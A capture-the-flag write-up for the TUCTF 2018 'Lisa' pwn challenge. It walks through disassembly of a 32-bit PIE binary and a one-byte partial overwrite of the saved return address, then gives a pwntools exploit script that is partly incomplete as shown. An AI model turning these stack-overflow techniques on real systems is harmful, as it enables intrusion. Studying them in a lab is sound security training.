

# Lisa

We are given a [binary](../lisa) which leaks a heap address and has a stack based buffer overflow allowing us to overwrite at most 1 byte of the saved return address.

vagrant@amy:~/share/lisa$ file lisa
lisa: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=7f2cd300a5518deec5cb00e27dae466022fdacd9, not stripped

`PIE` and `NX` enabled.

gdb-peda$ checksec
CANARY : disabled
FORTIFY : disabled
RELRO : Partial

With these constraints, we can jump to the following locations:

│ 0x00000d01 8d8340000000 lea eax, [ebx + 0x40] ; "4" ; '@'
│ 0x00000d07 8b10 mov edx, dword [eax]
│ 0x00000d09 8d8348000000 lea eax, [ebx + 0x48] ; 'H'
│ 0x00000d0f 8b00 mov eax, dword [eax]
│ 0x00000d11 6a2b push 0x2b ; '+' ; size_t nbyte
│ 0x00000d13 52 push edx ; void *buf
│ 0x00000d14 50 push eax ; int fildes
│ 0x00000d15 e836f8ffff call sym.imp.read ; ssize_t read(int fildes, void *buf, size_t nbyte)
│ 0x00000d1a 83c40c add esp, 0xc
│ 0x00000d1d e89cfaffff call sym.checkPass
│ 0x00000d22 b800000000 mov eax, 0
│ 0x00000d27 8b5dfc mov ebx, dword [local_4h]
│ 0x00000d2a c9 leave
└ 0x00000d2b c3 ret

Essentially, we can jump to any location between `0xd00` and `0xdff`.

The initial user input is conveniently stored in such a manner that when we return from the call to `sym.checkPass`, our initial input is stored on the top of the stack giving us full control with a ROP chain. One caveat though is that we don't have an infoleak to give us a binary address which is unfortunately necessary as the binary is compiled with `PIE`.

[0x000005f0]> pdf @sym.checkPass
┌ (fcn) sym.checkPass 68
│ sym.checkPass ();
│ ; var int local_18h @ ebp-0x18
│ ; CALL XREF from sym.main (0xd1d)
│ 0x000007be 55 push ebp
│ 0x000007bf 89e5 mov ebp, esp
│ 0x000007c1 83ec18 sub esp, 0x18
│ 0x000007c4 e863050000 call sym.__x86.get_pc_thunk.ax
│ 0x000007c9 0537380000 add eax, 0x3837 ; '78'
│ 0x000007ce 8d9040000000 lea edx, [eax + 0x40] ; "4" ; '@'
│ 0x000007d4 8b12 mov edx, dword [edx]
│ 0x000007d6 8d8044000000 lea eax, [eax + 0x44] ; 'D'
│ 0x000007dc 8b00 mov eax, dword [eax]
│ 0x000007de 52 push edx
│ 0x000007df 50 push eax
│ 0x000007e0 e8aeffffff call sym.doStrcmp
│ 0x000007e5 83c408 add esp, 8
│ 0x000007e8 85c0 test eax, eax
│ ┌─< 0x000007ea 7407 je 0x7f3
│ │ 0x000007ec e811000000 call sym.lisa
│ ┌──< 0x000007f1 eb0c jmp 0x7ff
│ ││ ; CODE XREF from sym.checkPass (0x7ea)
│ │└─> 0x000007f3 8d45e8 lea eax, [local_18h]
│ │ 0x000007f6 50 push eax
│ │ 0x000007f7 e864ffffff call sym.fail
│ │ 0x000007fc 83c404 add esp, 4
│ │ ; CODE XREF from sym.checkPass (0x7f1)
│ └──> 0x000007ff 90 nop
│ 0x00000800 c9 leave
└ 0x00000801 c3 ret

If we can somehow call `sym.lisa`, we can print out the flag.

The heap address which is leaked is the address of where the password to which the input is compared to is stored. By returning to the call to `read` in `main`, we can overwrite the stored password with 0x0 bytes allowing us to pass the password check and therefore calling `lisa`.

vagrant@amy:~/share/lisa$ ./lisa
Here's your share: 0x56bc7008
What? The Mona Lisa!
Look, if you want somethin' from me, I'm gonna need somethin' from you alright...


from pwn import *

context(arch='i386', os='linux')
# p = process('./lisa')
p = remote('', 12345)

p.recvuntil('share: ')
leak = p.recvuntil('\n').strip()
leak = int(leak, 16)
heap_base = leak & 0xfffffff0

payload = ''
payload += p32(0)
payload += p32(leak)
payload += p32(1)

payload = ''
payload += 'a' * 24
payload += 'cccc'
payload += '\x15'
payload = payload.ljust(0x2b, '\x00')


s = p.recv()
print s


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> TUCTF{wh0_pu7_7h47_buff3r_7h3r3?}

Original writeup (https://github.com/ByteBandits/writeups/tree/master/tu-ctf-2018/pwn/lisa/jaiverma).